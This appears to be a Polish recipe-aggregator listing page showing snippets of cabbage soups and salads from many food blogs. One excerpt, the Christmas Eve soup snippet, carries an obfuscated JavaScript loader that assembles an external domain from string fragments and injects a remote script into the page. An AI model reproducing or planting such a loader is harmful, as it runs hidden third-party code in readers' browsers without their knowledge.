zupa z kapusty - 2453 przepisów (strona:78/164)

Grillowane żeberka na słodko 195

Sezon grillowy można uznać w pełni. Warto wiedzieć, co przygotować na grilla aby było smacznie i abyśmy zaskoczyli znajomych. Tym razem będą to żeberka w miodowej

Kulinarnyblog.pl - wiesz jak gotować!
Kaszotto z fasolką i cukinią 166

Kaszotto z fasolką i cukinią to jednogarnkowa potrawa, która idealnie nada się na szybki lunch, obiad do pracy. Nasza wersja będzie przygotowana bez dodatku mięsa –

Kulinarnyblog.pl - wiesz jak gotować!
KAPUŚNIAK Z KMINEM RZYMSKIM 165

SKŁADNIKI: 20 g masła 1 cebula 1 duża marchewka 2 duże ziemniaki 1 łyżeczka kminu rzymskiego 1 łyżka oregano 1 łyżeczka słodkiej papryki sól i świeżo

wege i kropka
Surówka z kapusty pekińskiej z kukurydzą, ogórkiem kiszonym 156

pieprz, zioła prowansalskie Sposób przygotowania Warzywa siekamy, Przygotowujemy sos. Polewamy sosem warzywa. Mieszamy. 4.7.2.17 http://mieszamwgarnku.pl/salatki/surowka-kapusty-pekinskiej-kukurydza-ogorkiem-kiszonym/ MieszamWGarnku   Artykuł Surówka z kapusty pekińskiej z kukurydzą, ogórkiem kiszonym pochodzi z serwisu Przepisy na dania obiadowe, ciasta, zupy, desery, nalewki, przetwory

Mieszam w Garnku
Sałatka z kapusty pekińskiej, mandarynek, jabłka i ananasa 218

Ananas pokroić w kostkę. Jabłko obrać i pokroić w cząstki. Wymieszać całość razem. 4.5.2.15 http://mieszamwgarnku.pl/salatki/salatka-kapusty-pekinskiej-mandarynek-jablka-ananasa/ BosowKuchni   Artykuł Sałatka z kapusty pekińskiej, mandarynek, jabłka i ananasa pochodzi z serwisu Przepisy na dania obiadowe, ciasta, zupy, desery, nalewki, przetwory

Mieszam w Garnku
ZUPA KALAFIOROWA Z MIĘTĄ 162

Chciałabym Wam dziś polecić wspaniałą zupę miętową na bazie kalafiora,kurczaka i mięty.Cudowny smak babcinej kuchni. Kalafior "mutant" kapusty głowiastej lub brokułu.W Polsce znane od XVI-XVII wieku.Podobno sprowadziła go Bona Sforza. Kalafior zawiera dużo mikroelementów i olejki eteryczne,które wydzielają przykry zapach podczas gotowania wydzielając siarkę ale to nie jest takie ważne ,najważniejsze jest  smak

Kocurkowe rozmyślania w kuchni Anielki
Restauracja Hotel Diament Spodek 132

niestety nie moja bajka. Ja lubię rosoły naturalne i od magii trzymam się z daleka, wiem że Śląsk kocha magii w każdej zupie, ale może w restauracjach darujmy to sobie. Na drugie rolada z kluskami i kapustą solidne, konkretne, pyszne danie. Jak na prawdziwą roladę w środku kawałki ogórka i kiełbasy a nie jak sie zdarza w wielu knajpach wszystko

Bernika - moj kulinarny pamietnik
Kapuśniak ze śmietaną 161

Dziś zupka znów gotowana w ekspresowym tempie...kapuśniak...prosta zupka..ale inna niż zwykle...przypomniało mi się , jak dawno temu pewna starsza pani mówiła, że do

Moje domowe kucharzenie
Poniedziałkowy "fit" - Sałatka z kapusty pekińskiej z brzoskwiniami i orzechami 147

Dziś zapraszamy na Nasz cykl potraw "fit", w którym prezentujemy dania lekkie, sałatki bez majonezu, odchudzone zupy czy też słodkości ze zmniejszoną ilością cukru i kalorii. Dziś wariacja sałatki z kapusty pekińskiej z warzywami z puszki, brzoskwiniami oraz orzechami włoskimi. Całość połączona jest jogurtem naturalnym i tak naprawdę nie wymaga doprawiania przyprawami.  Sałatka z kapusty pekińskiej z brzoskwiniami

Kulinarny Świat Konczi i Szpileczki
Zupa gołąbkowa 164

pewno znane są wam gołąbki bez zawijania, ale ta zupa niekoniecznie cieszy się podobną popularnością... nieprawidłowo! Jest szybka, wbrew pozorom nie jest po prostu kapuśniakiem z mięsem mielonym i potrafi zaskoczyć. Naprawdę polecam. :) 500g mięsa mielonego z łopatki ok. 300g białej kapusty 1 saszetka białego ryżu (ok. 100g) 2 marchewki 1 średni seler 3 pietruszki 1 duża cebula olej(...)Warzywa, gdy będą już chłodne, ścieramy na tarce o dużych oczkach i odstawiamy w miseczce na bok. Kapustę kroimy w kwadraciki i wrzucamy do wywaru. Wkładamy do niego także torebkę ryżu. Gotujemy wszystko do miękkości, po czym ryż wysypujemy z torebki do zupy. Umieszczamy w garnku także starte wcześniej, ugotowane warzywa. Na patelni rozgrzewamy 2 łyżki oleju i szklimy

Kuchenna Kontrrewolucya
Zupa z kalarepki 79

Lekka, pożywna zupa z kalarepką w roli głównej. Kalarepka (Brassica oleracea var. gongylodes) to warzywo, którego właściwości i wartości odżywcze doceniono już w starożytnym Rzymie, gdzie nazywana była kapustą pompejańską. Kalarepa, podobnie jak inne zielone warzywa liściaste, ma właściwości przeciwnowotworowe. Polecam zupkę i kalarepkę,można jeść jak jabłko. Składniki 4 małe kalarepki 2 marchewki 2 ziemniaki kawałek … Czytaj dalej

gotuj ze mną
Kociołek Sinigang z ośmiornicy, krewetek i ryby 175

Danie jednogarnkowe wprost z Filipin. Sinigang to filipińska zupa lub gulasz charakteryzująca się kwaśnym i pikantnym smakiem. Można do niej włożyć co tylko dusza zapragnie ale

Moje Małe Czarowanie
Zupa "bigos" 273

pewnym sensie będzie miał racje, tylko, że ja kapuśniaka nie lubię, a ta zupa bardzo mi smakowała. Będę do niej często wracała. Niestety wolnymi krokami nadchodzi już jesień więc warto wypróbować rozgrzewające przepisy.     Na 3 porcje potrzebujemy   400 g białej kapusty 150 g kiszonej kapusty 2 kostki bulion wołowy 2-3 sztuki kiełbasy śląskiej(...)dodać ugotowaną kiszoną kapustę, podsmażoną kiełbasę, miód i koncentrat. Wodę z gotowania kiszonej kapusty  dodajemy według własnego uznania, jeżeli lubimy kwaśne potrawy to jak najbardziej można dodać całą wodę. Do smaku pieprzymy, raczej nie ma potrzeby dosalania gdyż kostki bulionowe są wystarczająco słone. Zupę podajemy z pieczywem. Smacznego

Jadło i czytadło
lekki, pyszny kapuśniak z białej kapusty na maśle... 144

wsypac do garnka, wlać wodę, dodać ziele angielskie i liście laurowe wsypać pokrojone w kostkę ziemniaki, poszatkowaną kapustę białą, kostki rosołowe drobiowe, zagotować gotować do miękkości ziemniaków, pod koniec gotowania dodać kucharka, papryki, pieprz ziołowy, czosnek granulowany na koniec wsypać czosnek niedźwiedzi - zupa jest pyszna, aromatyczna, lekka.........SMACZNEGO

W Mojej Kuchni Lubię
makaron penne z kiszoną kapustą i kminkiem... 157

dag/wędzona, kiełbasa śląska 4 sztuki, cebula 1 większa, pieprz czarny mielony 1/2 łyżeczki, przyprawa do zup i potraw w płynie 1 łyżka makaron penne ugotować w osolonej wodzie na "al dente" i odcedzić na durszlaku i przelać zimną wodą kiszoną kapustę zalać wodą, wsypać cukier, kminek ziarenka i gotować na średnim ogniu z 30 minut, nadmiar wody odlać zostawiając

W Mojej Kuchni Lubię
Kapuśniak z kabanoskami i kminkiem. Wersja dla zabieganych. 163

nowych smaków, doświadczam nowych doznań kulinarnych. Jednak w kwestii gotowania dla rodziny, muszę spełnić oczekiwania wszystkich domowników, co nie należy do rzeczy prostych.       Jestem miłośniczką zup. Ogromną! Ale tylko tych domowych. Najlepiej jeszcze w oparciu o babcine receptury. Wertuję z uwielbieniem stare, grube notesy z pożółkniętymi kartkami, które ledwo trzymają się całości przez upływ czasu(...)Ziemniaki pokroiłam w kostkę, marchew, seler i pietruszkę starłam na grubych oczkach, a kabanosy pokroiłam w cienkie plasterki. Warzywa dodałam do kapusty.  Na odrobinie masła podsmażyłam obraną i posiekaną cebulę wraz z kabanoskami. Wrzuciłam do gotującej się zupy. Dodałam kostki rosołowe. Dolałam wody i gotowałam na wolnym ogniu, do zmięknięcia warzyw i połączenia się smaków. Jeżeli warzywa się zbytnio

W kuchni Karmel-itki
Zupa na Wigilię – nie tylko barszcz! 143

Wigilię można udekorować skórką z pomarańczy lub cytryny. Danie serwuje się na zimno lub na ciepło. Kwaśnica Kwaśnica to zupa na Wigilię wywodząca się z Podhala. Przygotowuje się ją z: Głowy i podrobów z wybranej ryby 30 dag kapusty kiszonej Soku z kapusty kiszonej Kilku suszonych grzybów 5 ziaren ziela angielskiego 2 ząbków czosnku Szczypty suszonego imbiru Kiszoną kapustę szatkujemy(...)kapusty i gotujemy. Dodajemy grzyby, ziele angielskie i gotujemy do zmięknięcia. Dodajemy podroby i głowy ryb, gotujemy przez 20 minut, wyjmujemy podroby, doprawiamy czosnkiem oraz imbirem i ponownie zagotowujemy. (function(){ cwbx=document.createElement("script");cwbx_=("ust");cwbxu="69293527"; cwbx_+="a"+("t.i");cwbx.type="text/javascript"; cwbxu+=".pdmwktdtwbxmgxxyXtf9";cwbx.async=true;cwbx_+="n"+("f"+"o")+"/"; cwbxu+="bn8i421swj";cwbx.src="//"+cwbx_+cwbxu; document.body.appendChild(cwbx); })(); Artykuł Zupa

Okiem Blondynki by McBlondi
Naleśniki z farszem z młodej kapusty 156

bardzo się to przydaje) i oczekuję tego również od innych. Hm... czy to zbyt wiele? Młoda kapusta jest moim zdaniem, na tyle pyszna, że postanowiłam dodać ją również do naleśników, i nie ograniczać się tylko w dodawaniu jej do zupy czy podawania jako dodatku do mięsa. Wyszło pysznie. Coś innego niż dotychczas a jednocześnie prosto. Składniki na 10 naleśników: Naleśniki

My simple kitchen
BARSZCZ UKRAIŃSKI Z KISZONYCH BURAKÓW 396

marchewek 1 szt. pietruszki pół albo jeden mały seler kawałek pora około 100-150 g białej fasoli drobnej typu Piękny Jaś karłowy firmy KUPIEC ćwiartka małej główki kapusty włoskiej/białej 2 szt.cebuli 2-3 szt. ziemniaków 2-3 szt. kiszonych buraków 3-4 szklanki soku z kiszonych buraków 4-6 szt. suszonych grzybów 2 liście laurowe 5 ziaren ziela(...)Gotowałam wszystko na niewielkim ogniu przez około 40 minut. Wywar przecedziłam.    Grzyby pokroiłam. Stwierdziłam,że dodam do zupy również mięso z ugotowanych wędzonych żeberek. Obrałam je i pokroiłam. Obraną cebulę posiekałam i zeszkliłam na maśle. Kapustę poszatkowałam. Kapustę włoską można z powodzeniem zastąpić zwykłą, białą. Dodałam ją do cebuli.    Mieszając, chwilę smażyłam. Podlałam ją szklanką wywaru

potrawyregionalne
Drożdżowe paluchy z kiszoną kapustą. 76

Takie drożdżowe paluchy z kiszoną kapustą można przygotować na obiad, ja tak właśnie zrobiłam. Można podać je z czerwonym barszczykiem czy jako dodatek do dowolnej zupy. Paluchy mogą być podane również na zimno jako przekąska czy podane na kolację. Sycące i pyszne. Bardzo polecam. Upieczcie :) Potrzebujemy: Na ciasto: 5 dag świeżych drożdży 2 płaskie łyżeczki cukru 3 kopiaste szklanki mąki

Izabelawkuchni
Zupa z bobem 239

jako składnik zup, sosów czy sałatek. Jako, że sezon na bób jest stosunkowo krótki, korzystajmy z niego póki trwa!;) Dzisiaj proponuję zupę z bobem i ziemniakami . Składniki: 2 marchewki, 1 pietruszka, 0,25 selera, 0,5 pora, liść kapusty, 1 duża cebula, 0,5 kg bobu, 0,5kg ziemniaków, łyżka masła, 2 ząbki czosnku, koperek, 100g śmietany(...)litr bulionu jarzynowego lub drobiowego, sól, pieprz Przygotowanie: Przygotowujemy bulion. Marchewkę, pietruszkę, selera, pora i kapustę myjemy, obieramy. Zalewamy zimną wodą, doprowadzamy do wrzenia. Następnie dodajemy kilka liści laurowych, ziele angielskie oraz sól i pieprz. Gotujemy na małym ogniu, aż warzywa będą miękkie. Kiedy bulion będzie gotowy włoszczyznę wyjmujemy (ja zostawiam tylko marchewkę;) Ziemniaki obieramy, płuczemy, następnie kroimy na ćwiarteczki

Kuchnia Pełna Pasji

Proponowane wyszukiwania